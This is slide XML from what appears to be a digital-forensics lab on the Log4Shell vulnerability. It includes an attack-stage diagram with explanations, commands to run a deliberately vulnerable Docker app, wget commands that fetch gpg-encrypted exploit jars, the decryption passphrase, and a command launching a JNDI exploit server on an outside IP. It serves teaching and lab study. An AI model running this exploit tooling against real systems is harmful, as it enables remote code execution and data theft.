            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> [label="6. Data\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>nExfiltration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> or\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>nFurther</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Exploitation"];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>CoveringTracks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> [label="7. Covering\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>nTracks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>"];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>VulnerableSystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>ExploitVulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>ProcessPayload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>RemoteCodeExecution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>PrivilegeEscalation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>ExfiltrationOrExploitation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>CoveringTracks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1"/>
              <a:t>Identification of a Vulnerable System</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: Attackers begin by identifying a target system that utilizes the Apache Log4j library, a common choice for logging in Java applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1"/>
              <a:t>Exploiting the Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: Attackers craft a malicious payload, which they inject into the target system. This payload is often embedded in user inputs, HTTP request parameters, or other data entry points where Log4j is used for logging.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1"/>
              <a:t>Processing of Malicious Payload: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>When Log4j processes the malicious payload, it inadvertently triggers the vulnerability within the Log4j library. Specifically, it exploits the mishandling of certain log messages with crafted inputs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1"/>
              <a:t>Remote Code Execution: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Due to the vulnerability, the attacker's payload is executed within the context of the application that utilizes Log4j. This allows the attacker to execute arbitrary code on the target system, gaining control over it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1"/>
              <a:t>Privilege Escalation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>With control of the target system, the attacker may attempt to escalate privileges to access sensitive data or carry out additional malicious actions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1"/>
              <a:t>Data Exfiltration or Further Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Depending on their objectives, the attacker may use the compromised system to exfiltrate data, launch additional attacks on other systems, or engage in other nefarious activities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1"/>
              <a:t>Covering Tracks: To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>maintain their presence and evade detection, the attacker may take actions such as deleting logs, installing backdoors, or employing other strategies to conceal their activities on the compromised system.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>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5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2756643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https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html#license-lightbox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https://github.com/christophetd/log4shell-vulnerable-app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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="210471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sudo apt install docker.io</a:t>
            </a:r>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30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1068388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sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>docker run --name vulnerable-app --rm -p 8080:8080 ghcr.io/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" err="1"/>
              <a:t>christophetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>/log4shell-vulnerable-app@sha256:6f88430688108e512f7405ac3c73d47f5c370780b94182854ea2cddc6bd59929</a:t>
            </a:r>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31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="91259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a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>docker run: This is the Docker command used to run a container.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>--name vulnerable-app: This part of the command assigns a name to the Docker container. In this case, the name "vulnerable-app" is given to the container.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>--rm: This flag tells Docker to automatically remove the container when it stops running. It's often used for temporary or disposable containers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>-p 8080:8080: This flag maps ports between the host machine and the container. It specifies that port 8080 on the host should be mapped to port 8080 in the container. This allows you to access the application running in the container on port 8080 of your host machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>ghcr.io/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>christophetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>/log4shell-vulnerable-app@sha256:6f88430688108e512f7405ac3c73d47f5c370780b94182854ea2cddc6bd59929: This is the image name and tag for the Docker container. It specifies the image to use when creating the container. In this case, the container is based on an image located at the specified URL (ghcr.io/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>christophetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>/log4shell-vulnerable-app) and tagged with a specific hash (@sha256:6f88430688108e512f7405ac3c73d47f5c370780b94182854ea2cddc6bd59929). The image likely contains a vulnerable application for testing purposes.</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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="221347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sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> docker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> -a</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{132FFCAB-4F71-4364-B479-A88DA389FC0C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="286846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 -jar JNDIExploit-1.2-SNAPSHOT.jar -i 136.160.215.13 -p 8888</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{132FFCAB-4F71-4364-B479-A88DA389FC0C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="395611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37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3296036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"c:\Program Files\Java\jdk1.8.0_202\bin"\java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 136.160.215.13 -p 8888</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{132FFCAB-4F71-4364-B479-A88DA389FC0C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2350800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sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> docker run --name vulnerable-app --rm -p 8080:8080 ghcr.io/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" err="1"/>
              <a:t>christophetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>/log4shell-vulnerable-app@sha256:6f88430688108e512f7405ac3c73d47f5c370780b94182854ea2cddc6bd59929</a:t>
            </a:r>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42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="181121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"c:\Program Files\Java\jdk1.8.0_202\bin"\java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 136.160.215.13 -p 8888</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{132FFCAB-4F71-4364-B479-A88DA389FC0C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3985195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digraph </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>StateDiagram</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>rankdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>=TB; // Top to bottom layout</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  node [shape=box, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>fontsize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>=12, width=2];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  Attacker [label="Attacker"];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  Victim [label="Victim"];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  subgraph </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>cluster_attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    label="Attacker States";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    color=red;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    style=dotted;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    Idle;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    Identifying;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    Exploiting;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    Control;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>PrivilegeEscalation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    Exfiltrating;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>CoveringTracks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  subgraph </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>cluster_victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    label="Victim States";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    color=blue;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    style=dotted;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>NormalOperation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    Vulnerable;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    Compromised;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>ControlLoss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    Alert;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    Recovery;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  // Attacker state transitions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  Attacker -&gt; Identifying;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  Identifying -&gt; Exploiting;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  Exploiting -&gt; Control;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  Control -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>PrivilegeEscalation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>PrivilegeEscalation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> -&gt; Exfiltrating;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  Exfiltrating -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>CoveringTracks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  // Victim state transitions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  Victim -&gt; Vulnerable;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  Vulnerable -&gt; Compromised;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  Compromised -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>ControlLoss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>ControlLoss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> -&gt; Alert;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  Alert -&gt; Recovery;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>}</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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="146215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command we used for encrypt the JNDI : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>gpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> --symmetric JNDIExploit.v1.2.zip and key: cyfi750</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> –q https://raw.githubusercontent.com/frankwxu/digital-forensics-lab/main/Log4JShell/JNDIExploit.v1.2.zip.gpg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>md5sum JNDIExploit.v1.2.zip.gpg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>49d26e4094655dc8d229e1f581b96d14</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{132FFCAB-4F71-4364-B479-A88DA389FC0C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4108880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gpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> --decrypt JNDIExploit.v1.2.zip.gpg &gt; JNDIExploit.v1.2.zip</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50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="201629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wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> –q https://raw.githubusercontent.com/frankwxu/digital-forensics-lab/main/Log4JShell/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar.gpg</a:t>
            </a:r>
          </a:p>
